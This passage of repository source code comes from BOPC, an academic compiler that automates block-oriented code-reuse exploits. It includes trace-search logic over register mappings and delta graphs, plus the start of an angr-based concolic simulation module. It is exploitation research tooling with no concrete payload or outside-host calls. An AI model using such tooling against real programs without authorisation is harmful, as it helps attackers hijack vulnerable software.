/= n\n                what, k = k // fact, k % fact       # select element and update k\n                \n                # add element to shuffle list and remove it from temporary group\n                shuff.append( tmpgrp.pop(what) )\n\n            return shuff\n\n        # -------------------------------------------------------------------------------\n\n  \n        # ---------------------------------------------------------------------\n        # Initialize permutation struct according to statement groups\n        # ---------------------------------------------------------------------\n        permlist = []                               # permutation list\n        upper    = 1                                # total number of permutations\n\n        # iterate on statement groups. Statements in each group can be executed in any\n        # order without affecting the execution flow of the SPL program.\n        for group in self.__IR.itergroup():\n            G = sorted([stmt['uid'] for stmt in group if stmt['type'] != 'varset'])\n            \n            if G:                                   # discard empty groups\n                fact = math.factorial(len(G))         \n\n                # add group to the permutation list. Each element contains the group uids (G),\n                # the total number of permutations (n) and the current permutation (i).    \n                permlist.append( {'G':G, 'n':fact, 'i':1} )\n\n                upper *= fact                       # calculate upper bound of permutations\n\n\n        # update upper bound according to the configuration\n        if N_OUT_OF_ORDER_ATTEMPTS != -1 and upper > N_OUT_OF_ORDER_ATTEMPTS:\n            upper = N_OUT_OF_ORDER_ATTEMPTS\n\n\n        # return the first permutation. 
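`kth_permutation()` above is the factorial-number-system (Lehmer code) trick: k is decomposed digit by digit, and each digit selects the next element from the pool of remaining ones. A self-contained Python 3 sketch of the same idea (floor division made explicit; in the original Python 2 code, `/` on ints already truncates):

```python
import math

def kth_permutation(group, k):
    pool = list(group)                  # work on a copy of the group
    fact = math.factorial(len(pool))
    k %= fact                           # wrap around after n! permutations
    out = []
    while pool:
        fact //= len(pool)              # n! -> (n-1)! -> ... -> 1
        idx, k = divmod(k, fact)        # current digit picks the next element
        out.append(pool.pop(idx))
    return out
```

k = 0 yields the identity order and k = n! - 1 the fully reversed one; all n! values of k produce distinct permutations, which is what lets `__shuffle()` enumerate orderings one index at a time.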
Simply merge all groups (G) from 'permlist'\n        yield [x for p in permlist for x in p['G']]\n\n\n        # ---------------------------------------------------------------------\n        # Calculate the remaining upper-1 permutations (1 at a time)\n        # ---------------------------------------------------------------------\n        # make a list of the permutations groups. E.g.: [[0], [8, 10, 12], [14], [16, 18]]\n        perm = [p['G'] for p in permlist]\n\n        for i in range(upper - 1):            \n            for j in range(len(permlist)):          # for each permutation group\n\n                # calculate the (i-th + 1) permutation (the next one) for the current group\n                perm[j] = kth_permutation(permlist[j]['G'], permlist[j]['i'])\n                \n                # check if we exhausted all permutations for that group\n                if  permlist[j]['i'] % permlist[j]['n'] != 0:\n                    permlist[j]['i'] += 1           # if not simply increment current index\n                    break                           # and don't move on the next group\n\n                permlist[j]['i'] += 1               # increment index and move on the next group\n                \n            yield [x for p in perm for x in p]      # return the next permutation (merge first)\n \n\n\n    # ---------------------------------------------------------------------------------------------\n    # __enum_tree(): TODO\n    #\n    # \n    # :Ret: If function returns 0, we have found a solution!\n    #\n    def __enum_tree( self, tree, simulation, path=[], prev_uid=-1, totpath=set()  ):\n\n        print 'TREE', tree\n        #return 0\n\n\n        # ---------------------------------------------------------------------\n        # If tree is empty we have reached a solution\n        # ---------------------------------------------------------------------\n        if not tree:\n            dbg_arb(DBG_LVL_2, 'Path simulated successfully: ', path)\n       
     \n\n            # Ok we have executed all statements (for one branch of the Hk) successfully.\n            # Execution has stopped at the beginning of the accepted block. For goto and\n            # return statements that's ok, but for regset, regmod, call and cond we have\n            # to execute the final block as well.\n\n            if self.__IR[prev_uid]['type'] not in ['jump', 'return'] or \\\n                 self.__IR[prev_uid]['type'] == 'return' and self.__IR[prev_uid]['target'] == -1:\n\n                dbg_prnt(DBG_LVL_2, \"Final statement is '%s', so we need to do one more step...\" % \n                                        self.__IR[prev_uid]['type'])\n\n                term = simulation.step(self.__IR[prev_uid])\n\n                if term == -1: return -1\n\n                self.__terminals += term\n\n            else: self.__terminals.append( path[-1][1] )\n\n\n            emph('Solution found!', DBG_LVL_1)\n            dbg_arb(DBG_LVL_2, 'Path so far', path)\n\n            # base case. 
Tree enumerated successfully\n            # if we reach this point we have a solution (a trace)\n\n            simulation.finalize()\n\n            self.__simstash.append(simulation) \n\n            # if you want to visualize things\n            #\n            # visualize('cfg_paths', entry=self.__ep,\n            #            options=VO_DRAW_CFG | VO_DRAW_CLOBBERING |\n            #            VO_DRAW_ACCEPTED | VO_DRAW_SE_PATHS, paths=allp)\n    \n            # self.__total_path.union(totpath)\n            for a in totpath:\n                self.__total_path.add(a)\n\n            X = []\n            for a,b,c in path:\n                X.append( (c, a) )\n\n            for a, b in to_edges(X):\n                self.__path.add((a,b))\n\n            # print 'TOTAL_PATH', totpath, self.__total_path\n            return 0\n            \n\n\n        # ---------------------------------------------------------------------\n        # Tree is not empty and next node is unique\n        # ---------------------------------------------------------------------\n        elif isinstance(tree[0], tuple):\n            uid, currb, nextb = tree[0]\n            \n            # TODO: If Hk is disconnected (due to dummy gotos) then\n            # a new state needs to be initialized\n            #\n            # or we can simply discard the state....\n            #\n            # So, in case of a gap, just throw an exception\n \n            print uid, self.__IR[uid], tree[0], self.__adj\n            print 'PATH', path, [p[2] for p in path] #, self.__adj[ uid ][0]\n\n            # if currb == nextb: step() && simu_edge(step().addr, nextb) (to go back)\n            loopback = False\n\n            #if currb == nextb and uid in self.__adj:# and self.__adj[ uid ][0] in [p[2] for p in path]:              \n\n            # tree[0] is a tuple so we are sure that  self.__adj[uid] has 1 element\n            if currb == nextb and uid in self.__adj and uid >= self.__adj[uid][0]:\n                
error('Do a step first')\n                loopback = True\n\n\n            if nextb == -1:\n                nextb = currb                   # make target to be itself\n\n            if currb == -1:\n                subpath = []\n            else:\n                subpath = simulation.simulate_edge(currb, nextb, uid, loopback)\n                if subpath == None:\n                    return -1\n\n            for (a,b) in to_edges(subpath):\n                totpath.add((a,b))\n\n            # edge simulated. Move on the next one!\n            if self.__enum_tree(tree[1:], simulation, path+[(currb, nextb, uid)], uid, totpath) < 0:\n                return -1\n\n\n        # ---------------------------------------------------------------------\n        # Tree is not empty and next node is a branch (2 paths)\n        # ---------------------------------------------------------------------\n        elif isinstance(tree[0], list):\n            if len(tree[0]) != 2:\n                raise Exception('Conditionals with >2 jump targets are not supported.')\n\n            # fork state            \n            # print 'FORK', path\n            # print 'TREEFORK', tree\n\n            uid0, _, _ = tree[0][0][0]\n            uid1, _, _ = tree[0][1][0]\n\n            # print 'UID0', uid0\n            # print 'UID1', uid1\n\n            if uid0 != uid1 and self.__IR[uid0]['type'] != 'cond':\n                raise Exception('Invalid!!! WTF should not happen!')\n\n            \n            condreg = [real for virt, real in self.__regmap \\\n                            if virt == '__r%d' % self.__IR[uid0]['reg']][0]\n\n            try:\n                # create the simulation object\n                simulation_2 = simulation.clone(condreg)\n                pass  \n            except Exception:\n                dbg_prnt(DBG_LVL_2, \"Cannot create simulation object 2. 
Discard current Hk\")\n                return -1\n            \n            self.__sim_objs.append(simulation_2)\n\n            warn('------------------------------- FIRST---------------------------')\n\n            # propagate previous uid as we only process lists here\n            X = self.__enum_tree(tree[0][0], simulation,  path, prev_uid, totpath)\n\n            warn('------------------------------- SECOND ---------------------------')\n            print simulation_2.constraints()\n\n            if X < 0 or \\\n               self.__enum_tree(tree[0][1], simulation_2, path, prev_uid, totpath) < 0:\n                    return -1\n\n            warn('------------------------------- DONE ---------------------------')\n\n        # ---------------------------------------------------------------------\n        #\n        # ---------------------------------------------------------------------\n        else:\n            raise Exception('Malformed tree!')\n\n        return 0\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __consistent_stashes(): This function checks whether all stashes (i.e., valid solutions) are \n    #       consistent. This is meaningful when delta graph is not flat (i.e., there are >1 active\n    #       stashes)\n    #\n    # :Ret: If stashes are consistent, function returns True. 
Otherwise, it returns False.\n    #\n    def __consistent_stashes( self ):\n        if len(self.__simstash) < 2:\n            return True\n\n        dbg_prnt(DBG_LVL_1, 'Checking whether stashes are consistent ...')\n\n        for simu in self.__simstash:\n            print 'Simulation', simu, simu.constraints()\n\n            # ispo: you're fixed ;)\n            # error('__consistent_stashes says: fix me ispo!!!!!')\n\n\n        # check if inireg, mem, and ext are consistent\n        for i in range(len(self.__simstash)):\n            for j in range(i+1, len(self.__simstash)):\n\n                # check\n                sim_a = self.__simstash[i]\n                sim_b = self.__simstash[j]\n                \n\n                sim_a.update_globals()          # update global variables\n                sim_b.update_globals()\n\n                # self.__inireg[ reg ] = val\n                for a, b in sim_a.inireg.iteritems():\n                    if b == None:\n                        continue\n                    \n                    if sim_b.inireg[a] != None and sim_b.inireg[a] != b:\n                        \n                        warn(\"Inconsistent values (0x%x != 0x%x) for register '%s'\" % \n                                (b, sim_b.inireg[a], a))\n\n                        return False\n\n    \n                for a, b in sim_a.mem.iteritems():\n                    if not b:                       # skip unneeded memory writes\n                        continue\n\n\n                    # address is used in both stashes\n                    if a in sim_b.mem and sim_b.mem[a]: \n\n                        if not isinstance(b, tuple) or not isinstance(sim_b.mem[a], tuple):\n                            continue\n\n                        if b[0] != sim_b.mem[a][0]:\n                            \n                            warn(\"Inconsistent values (0x%x:%d != 0x%x:%d) for address '0x%x'\" % \n                                (b[0], b[1], sim_b.mem[a][0], 
sim_b.mem[a][1], a))\n\n                            # what if sizes are different?\n                            if b[1] != sim_b.mem[a][1]:\n                                fatal('Idk how to handle that!!!!!!!')\n                            \n                            return False\n\n\n                # self.__ext[ var ] = (addr, value)\n                for a, b in sim_a.ext.iteritems():\n                    \n\n                    if a.shallow_repr() in sim_b.ext and sim_b.ext[a.shallow_repr()] != b:\n                        warn(\"Inconsistent values (0x%x:%d != 0x%x:%d) for external input '%s'\" % \n                                (b, sim_b.ext[a][0], sim_b.ext[a][1], a[0], a[1]))\n\n                        return False\n\n        for a, b in sim_a.mem.iteritems():\n            print 'MEM A', hex(a), b\n\n        print '---------------------------------------------------------'\n        for a, b in sim_b.mem.iteritems():\n            print 'MEM B', hex(a), b\n\n        # Assume they're ok for now...\n        return True\n        \n\n\n    # ---------------------------------------------------------------------------------------------\n    # __mapping_callback(): This callback function is invoked every time that a register and a\n    #       variable mappings are found.\n    #\n    # :Arg regmap: The register mapping as a list of (virtual_register, real_register) tuples\n    # :Arg varmap: The variable mapping as a list of (name, value) tuples\n    # :Ret: A returned value of 0 causes the callback function to be invoked again with a different\n    #       mapping (it means that the current mapping wasn't suitable). 
When the function returns -1,\n    #       the enumeration process halts and the callback function returns to the enum_mappings()\n    #       caller (this means that the current mapping ended up in a valid solution).\n    #\n    def __mapping_callback( self, regmap, varmap ):\n        self.__varmap = varmap                      # save current variable mapping\n        self.__regmap = regmap\n        self.__ctr   += 1                           # increment counter\n\n        #\n        # varmap = [('argv', '*<BV64 mem_7fffffffffef148_4056_64 + 0x68>'), \n        #          ('prog', '*<BV64 mem_7fffffffffef148_4056_64 + 0x30>')]\n        # self.__varmap = varmap\n        #\n        #\n        # for a, b in SYM2ADDR.iteritems():\n        #     print 'XXXX', a, hex(b)\n        #\n        # exit()\n        #\n        # regmap = [('__r0', 'r13'), ('__r1', 'rax')]\n        # varmap = [('array', '*<BV64 0x621bf0>')]\n        # self.__varmap = varmap\n        #\n        # regmap = [('__r0', 'rdi'), ('__r1', 'rsi')]\n        # varmap = [('array', 6851008L)]\n        # self.__varmap = varmap\n\n        \n        # in case you want to apply a specific mapping, discard all others\n        # TODO: Replace < with != (?)\n        if self.__options['mapping-id'] != -1 and self.__ctr < self.__options['mapping-id']: \n            # dbg_prnt(DBG_LVL_1, \"Discard current mapping.\")\n            return 0\n\n\n        # ---------------------------------------------------------------------\n        # Pretty-print the register/variable mappings\n        # ---------------------------------------------------------------------\n        emph('Trying mapping #%s:' % bold(self.__ctr), DBG_LVL_1)\n\n        s = ['%s <-> %s' % (bolds(virt), bolds(real)) for virt, real in regmap]\n        emph('\\tRegisters: %s' % ' | '.join(s), DBG_LVL_1)\n\n\n        s = ['%s <-> %s' % (bolds(var), bolds(hex(val) if isinstance(val, long) else str(val))) \n                    for var, val in varmap]\n        
emph('\\tVariables: %s' % ' | '.join(s), DBG_LVL_1)\n\n\n\n        # ---------------------------------------------------------------------\n        # Apply (any) filters to the current mapping (DEBUG)\n        # ---------------------------------------------------------------------\n\n        # if you want to enumerate mappings, don't move on\n        if self.__options['enum']:\n            return 0\n\n    \n        self.__options['#mappings'] += 1\n\n\n\n        # ---------------------------------------------------------------------\n        # Identify accepted and clobbering blocks\n        # ---------------------------------------------------------------------\n        '''\n        # We check this out on marking to be more efficient\n\n        if 'rsp' in [real for _, real in regmap]:   # make sure that 'rsp' is not used\n            fatal(\"A virtual register cannot be mapped to %s. Discard mapping...\" % bolds('rsp'))\n            return 0                                # try another mapping\n\n        if not MAKE_RBP_SYMBOLIC and 'rbp' in [real for _, real in regmap]:\n            fatal(\"A virtual register cannot be mapped to %s. Discard mapping...\" % bolds('rbp'))\n\n            return 0\n\n        '''\n\n\n        # given the current mapping, go back to the CFG and mark all accepted blocks\n        accblks, rsvp = self.__mark.mark_accepted(regmap, varmap)  \n        \n        # if there is (are) >= 1 statement(s) that don't have accepted blocks, discard mapping\n        if not accblks:\n            dbg_prnt(DBG_LVL_1, 'There are not enough accepted blocks. 
Discard mapping...')\n            return 0                                # try another mapping\n\n\n\n        # if there are enough accepted blocks, go back to the CFG and mark clobbering blocks\n        cloblks = self.__mark.mark_clobbering( regmap, varmap )\n\n        # At this point you can visualize the CFG\n        #\n        # visualize('cfg_test', entry=self.__entry,\n        #     options=VO_DRAW_CFG | VO_DRAW_CLOBBERING | VO_DRAW_ACCEPTED | VO_DRAW_CANDIDATE)\n\n\n        # add entry point to accblks (with min uid) to avoid special cases\n        accblks[ START_PC ] = [self.__entry]\n\n\n        # also add SPL's return address as an accepted block\n        for stmt in self.__IR:                      # return is the last statement in IR\n            if stmt['type'] == 'return':\n\n                # check that target address is a valid address of a basic block \n                if stmt['target'] != -1 and stmt['target'] not in ADDR2NODE:\n                    fatal(\"Return address '0x%x' not found\" % stmt['target'])\n\n                accblks[ stmt['uid'] ] = [ stmt['target'] ]\n\n\n        # ---------------------------------------------------------------------\n        # Pretty-print the accepted and clobbering blocks\n        # --------------------------------------------------------------------- \n        dbg_prnt(DBG_LVL_2, 'Accepted block set (uid/block):')\n\n        for a,b in sorted(accblks.iteritems()):\n            dbg_prnt(DBG_LVL_2, '\\t%s: %s' % (bold(a, pad=3), ', '.join(['0x%x' % x for x in b])))\n\n\n        dbg_prnt(DBG_LVL_3, 'Clobbering block set (uid/block):')\n\n        for a,b in sorted(cloblks.iteritems()):\n            dbg_prnt(DBG_LVL_3, '\\t%s: %s' % (bold(a, pad=3), ', '.join(['0x%x' % x for x in b])))\n\n\n        # ---------------------------------------------------------------------\n        # Shuffle statements and build the Delta Graph\n        # ---------------------------------------------------------------------\n        
dbg_prnt(DBG_LVL_1, \"Shuffling SPL payload...\")\n\n        for perm in self.__shuffle(accblks):        # start shuffling IR\n\n            dbg_arb(DBG_LVL_1, 'Statement order:', perm)\n\n\n            # build the adjacency list for that order\n            adj = self.__mk_adjacency_list(perm)\n            self.__adj = adj\n            # remove goto statements as they are problematic\n            adj, rm = self.__remove_goto(accblks, adj)\n\n            perm = filter(lambda x : x not in rm, perm)\n            perm = [(y, accblks[y]) for y in perm]\n\n            dbg_arb(DBG_LVL_3, \"Updated SPL statement adjacency list\", adj)\n            \n\n            # create the Delta Graph for the given permutation        \n            DG = D.delta(self.__cfg, self.__entry, perm, cloblks, adj)          \n            \n\n            # visualise delta graph\n            #\n            # visualize(DG.graph, VO_TYPE_DELTA)\n            # exit()\n   \n       \n\n            # select the K minimum induced subgraphs Hk from the Delta Graph\n            # Hk = a subset of accepted blocks that reconstruct the execution of the SPL payload) \n            for size, Hk in DG.k_min_induced_subgraphs( PARAMETER_K ): \n                if size < 0:                        # Delta Graph disconnected?\n                    dbg_prnt(DBG_LVL_1, \"Delta Graph is disconnected.\")\n                    break                           # try another permutation (or mapping)\n                \n                # Paths that are too long should be discarded as it's unlikely to find a trace\n                if size > MAX_ALLOWED_TRACE_SIZE:\n                    dbg_prnt(DBG_LVL_1, \"Subgraph size is too long (%d > %d). Discard it.\" % \n                                                    (size, MAX_ALLOWED_TRACE_SIZE))\n                    break                           # try another permutation (or mapping)\n\n                         \n                # subgraph is ok. 
Flatten it and make it a \"tree\", to easily process it\n                tree, pretty_tree = DG.flatten_graph(Hk)                \n\n                emph('Flattened subgraph (size %d): %s' % (size, bolds(str(pretty_tree))), DBG_LVL_2)\n                \n\n                # TODO: this check will discard \"trivial\" solutions (all in 1 block)\n                if size == 0:\n                    warn('Delta graph found but it has size 0' )\n                    # continue\n\n\n                # enumerate all paths, and fork accordingly\n\n\n                # Symbolic execution used?\n                self.__options['simulate'] = True\n\n\n                # visualise delta graph with Hk (induced subgraph) \n                #      visualize(DG.graph, VO_TYPE_DELTA)\n                #        exit()\n\n                #\n                # TODO: In case of conditional jump, we'll have multiple \"final\" states.\n                # We should check whether those states have conflicting constraints.\n                #\n                dbg_prnt(DBG_LVL_2, \"Enumerating Tree...\")\n\n                self.__simstash = []\n\n\n                # -------------------------------------------------------------\n                # Easter Egg: When entry point is -1, we skip it and we directly\n                # start from the next statement\n                # -------------------------------------------------------------\n                if self.__entry == -1:\n\n                    if not isinstance(tree[0], tuple):\n                        fatal('First statement is a conditional jump.')\n\n                    # drop first transition (from entry to the 1st statement) and start\n                    # directly from the 1st statement. There is no entry point.\n                    # \n                    # also update the entry point\n                    _, _, entry = tree.pop(0)\n\n                    pretty_tree.pop(0)\n\n                    emph(\"Easter Egg found! 
Skipping entry point\")\n\n                    emph('New flattened subgraph: %s' % bolds(str(pretty_tree)), DBG_LVL_1)\n             \n                else:\n                    entry = self.__entry            # use the regular entry point\n\n\n                try:\n                    # create the simulation object\n                    simulation = S.simulate(self.__proj, self.__cfg, cloblks, adj, self.__IR,\n                                            regmap, varmap, rsvp, entry)\n                except Exception, e:\n                    dbg_prnt(DBG_LVL_2, \"Cannot create simulation object. Discard current Hk\")\n                    continue\n\n\n                self.__sim_objs = [simulation]\n                self.__terminals = [tree[0][1]]\n\n                self.__total_path = set()\n                self.__path = set()\n                retn = self.__enum_tree( tree, simulation )\n\n                # del simulation                \n\n                dbg_prnt(DBG_LVL_2, \"Done. Enumeration finished with exit code %s\" % bold(retn))\n\n             \n                # visualize(self.__cfg.graph, VO_TYPE_CFG, \n                #           options=VO_CFG | VO_ACC | VO_CLOB | VO_PATHS,\n                #           func=self.__proj.kb.functions[0x41C750], entry=0x41C750, \n                #           paths=self.__total_path)\n                # exit()\n\n\n                if retn == 0 and self.__consistent_stashes():            \n                    self.__nsolutions += 1\n                    self.__options['#solutions'] = self.__nsolutions\n\n\n                    # # visualise delta graph with Hk\n                    #\n                    # visualize(DG.graph, VO_TYPE_DELTA, options=VO_PATHS | VO_DRAW_INF_EDGES,\n                    #           paths=self.__path)\n                    # exit()\n\n\n                    # # visualize CFG again\n                    # visualize(self.__cfg.graph, VO_TYPE_CFG, \n                    #           options=VO_CFG | VO_ACC | 
VO_CLOB | VO_PATHS,\n                    #           func=self.__proj.kb.functions[0x444A9D], entry=0x444A9D, \n                    #           paths=self.__total_path)\n                    # exit()\n\n                    print rainbow(textwrap.dedent('''\\n\\n\n                            $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $\n                            $                                                                     $\n                            $                 *** S O L U T I O N   F O U N D ***                 $\n                            $                                                                     $\n                            $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $\n                            '''))\n\n\n                    emph(bolds('Solution #%d' % self.__nsolutions))\n                    emph('Final Trace: %s' % bolds(str(pretty_tree)))\n\n                    output = O.output( self.__options['format'] )\n                    \n\n                    output.comment('Solution #%d' % self.__nsolutions)\n                    output.comment('Mapping #%d' % self.__ctr)\n                    output.comment('Registers: %s' % ' | '.join(['%s <-> %s' % (virt, real) for virt, real in regmap]))\n                    output.comment('Variables: %s' % ' | '.join(['%s <-> %s' % (var, hex(val) if isinstance(val, long) else str(val)) for var, val in varmap]))\n     \n                    output.comment('')\n                    output.comment('Simulated Trace: %s' % pretty_tree)\n                    output.comment('')\n\n                    output.newline()\n\n                    # cast it to a set to drop duplicates\n                    for addr in set(self.__terminals):\n                        output.breakpoint(addr)\n\n                    output.newline()\n                    output.comment('Entry point')\n                    output.set('$pc', '0x%x' %  entry)\n                    
output.newline()\n\n                    # for each active stash, dump all the solutions\n                    for simulation in self.__simstash:\n                        simulation.dump( output )\n\n                    emph(bolds('BOPC is now happy :)'))\n\n                    output.save(self.__options['filename'])                    \n            \n                    # save state\n                    if self.__options['solutions'] == 'one':                  \n\n                        for obj in self.__sim_objs: # free memory\n                            del obj\n\n                        return -1                   # we have a solution. No more mappings\n\n\n                for obj in self.__sim_objs: # free memory\n                    del obj\n\n            del DG\n\n        return 0                                    # try another mapping...      \n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor. 
Simply initialize private members\n    #\n    # :Arg project: Instance of angr project\n    # :Arg cfg: Binary's CFG\n    # :Arg IR: SPL's Intermediate Representation (IR)\n    # :Arg entry: Binary's entry point\n    # :Arg options: Additional options needed for the trace searching\n    #\n    def __init__( self, project, cfg, IR, entry, options ):\n        self.__proj    = project                    # store arguments internally\n        self.__cfg     = cfg\n        self.__IR      = IR\n        self.__entry   = entry\n        self.__options = options\n\n        self.__reg   = { }\n        self.__mem   = { }\n        self.__ext   = { }       \n\n        self.__solved     = False\n        self.__nsolutions = 0\n\n        # make sure that the upper bound is valid\n        assert(N_OUT_OF_ORDER_ATTEMPTS > 0 or N_OUT_OF_ORDER_ATTEMPTS == -1)\n              \n\n\n    # ---------------------------------------------------------------------------------------------\n    # trace_searching(): Build a trace that connects all functional blocks.\n    #\n    # :Arg mark: A graph marking object\n    # :Arg \n    # :Ret: If the function can successfully find a trace, it returns True. 
Otherwise it returns\n    #       False.\n    #\n    def trace_searching( self, mark ):\n        dbg_prnt(DBG_LVL_1, \"Trace searching algorithm started.\")\n\n        self.__mark = mark                          # store object internally\n        self.__ctr  = 0                             # clear mapping counter\n\n\n        # create a mapping object\n        mapping = M.map(mark.map_graph, self.__IR.nregs, self.__IR.nregvars)\n\n        # enumerate all possible register and variable mappings\n        rval = mapping.enum_mappings( self.__mapping_callback )\n\n        dbg_prnt(DBG_LVL_1, \"Trace searching algorithm finished with exit code %s\" % bold(rval))\n        \n        return rval\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # raw_results(): \n    #\n    def raw_results( self ):\n\n        if not self.__solved:\n            raise Exception('There is no trace!')\n\n        return self.__reg, self.__mem, self.__ext\n\n\n\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/simulate.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# simulate.py:\n#\n# This module performs the concolic execution. That is it verifies a solution proposed by search\n# module. For more details please refer to the paper.\n#\n#\n# * * * ---===== TODO list =====--- * * *\n#\n#   [1]. Consider overlapping cases. 
For instance, when we write e.g., 8 bytes at address X and\n#        then we write 4 bytes at address X+1, we may have issues\n#\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\nimport path\n\nimport angr\nimport archinfo\nimport struct\nimport signal\nimport copy\nimport time\n\n\n\n# ------------------------------------------------------------------------------------------------\n# Constant Definitions\n# ------------------------------------------------------------------------------------------------\n\n# WARNING: In case that relative addresses fail, adjust them.\n# TODO: Add command line options for them.\nMAX_MEM_UNIT_BYTES      = 8                         # max. memory unit size (for x64 it is 8 bytes)\nMAX_MEM_UNIT_BITS       = MAX_MEM_UNIT_BYTES << 3   # max. memory unit size in bits\n\nALLOCATOR_BASE_ADDR     = 0xd8000000                # the base address of the allocator\nALLOCATOR_GRANULARITY   = 0x1000                    # the allocation size\nALLOCATOR_CEIL_ADDR     = 0xd9000000                # the upper bound of the allocator\nALLOCATOR_NAME          = '$alloca'\n                          \nPOOLVAR_BASE_ADDR       = 0xca000000                # the base address of the pool\nPOOLVAR_GRANULARITY     = 0x1000                    # (safe) offset between pools\nPOOLVAR_NAME            = '$pool'\n\nSIM_MODE_INVALID        = 0xffff                    # invalid simulation mode\nSIM_MODE_FUNCTIONAL     = 0x0001                    # simulation mode: Functional\nSIM_MODE_DISPATCH       = 0x0000                    # simulation mode: Dispatch\n\nMAX_BOUND = 0x4000\n\n\n# addresses that are not recognized as R/W but they are\n_whitelist_ = [\n    0x2010028,                                      # fs:0x28\n    0xc0000000,                                     # __errno_location\n    0xc0000070                                      # fopen() internal\n]\n\n\n# ALLOCATOR_BASE_ADDR     = 0x686180   
             # the base address of the allocator\n# ALLOCATOR_CEIL_ADDR     = 0x686180+0x10000        # the upper bound of the allocator\n# POOLVAR_BASE_ADDR       = 0x680040                # the base address of the pool\n# MAX_BOUND = 0x400\n\nEXTERNAL_UNINITIALIZED = -1\n\n# -------------------------------------------------------------------------------------------------\n# simulate: This class simulates the execution between a pair of accepted blocks\n#\nclass simulate:\n    ''' ======================================================================================= '''\n    '''                             INTERNAL FUNCTIONS - AUXILIARY                              '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __sig_handler(): Symbolic execution may take forever to complete. To deal with it, we set\n    #       an alarm. 
When the alarm is triggered, this signal handler is invoked and throws an\n#       exception that causes the symbolic execution to halt.\n    #\n    # :Arg signum: Signal number\n    # :Arg frame: Current stack frame\n    # :Ret: None.\n    #\n    def __sig_handler( self, signum, frame ):        \n        if signum == signal.SIGALRM:                # we only care about SIGALRM\n\n            # angr may ignore the exception, so let's throw many of them :P\n            raise Exception(\"Alarm triggered after %d seconds\" % SE_TRACE_TIMEOUT)\n            raise Exception(\"Alarm triggered after %d seconds\" % SE_TRACE_TIMEOUT)\n            raise Exception(\"Alarm triggered after %d seconds\" % SE_TRACE_TIMEOUT)\n            raise Exception(\"Alarm triggered after %d seconds\" % SE_TRACE_TIMEOUT)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __in_constraints(): This function checks whether a symbolic variable is part of the\n    #       constraints.\n    #\n    # :Arg symv: The symbolic variable to check\n    # :Arg state: Current state of the symbolic execution    \n    # :Ret: If symv is in constraints, function returns True. Otherwise it returns False.\n    #\n    def __in_constraints( self, symv, state=None ):\n        if not state:                               # if no state is given, use the current one\n            state = self.__state\n\n\n        # drop the \"uninitialized\" thing from everywhere\n        symvstr = symv.shallow_repr().replace(\"{UNINITIALIZED}\", \"\")\n\n        # We may have this in the constraints: \n        #   <Bool Reverse(mem_801_64[7:0] .. Reverse(mem_801_64)[55:0]) != 0x0>\n        #\n        # But symvstr is:\n        #   <BV64 Reverse(mem_801_64[7:0] .. 
Reverse(mem_801_64)[55:0])>  \n        #\n        # A quick fix is to drop the type:\n        \n        symvstr2 = symvstr[symvstr.find(' '):-1]\n   \n        # print 'symvstr2', symvstr2\n\n        # this is the old style check \n        if symvstr2 in ' '.join([c.shallow_repr().replace(\"{UNINITIALIZED}\", \"\") \\\n                                    for c in state.se.constraints]):\n            return True\n\n        \n        # reinforce function with a stronger check\n        for constraint in state.se.constraints:\n        # print 'CONTRST', constraint\n\n            try:\n                # treat constraint as an AST and iterate over its leaves\n                for leaf in constraint.recursive_leaf_asts:\n                # print '\\tLEAF', symv, symvstr, leaf, leaf.shallow_repr().replace(\"{UNINITIALIZED}\", \"\")\n\n                    # we can't compare them directly, so we cast them into strings first\n                    # (not a very \"clean\" way to do that, but it works)\n                    if leaf.shallow_repr().replace(\"{UNINITIALIZED}\", \"\") == symvstr:\n                        return True                 # symbolic variable found!\n\n            except Exception, err:\n                # fatal('__in_constraints() unexpected exception: %s' % str(err))\n                pass\n\n        return False                                # symbolic variable not found\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __getreg(): Get the symbolic value that a register has in the current state.\n    #\n    # :Arg reg: The name of the register\n    # :Arg state: Current state of the symbolic execution\n    # :Ret: The symbolic value for that register.\n    #\n    def __getreg( self, reg, state=None ):\n        if not state:                               # if no state is given, use the current one\n            state = self.__state\n\n        try:\n            return {    \n                'rax' : 
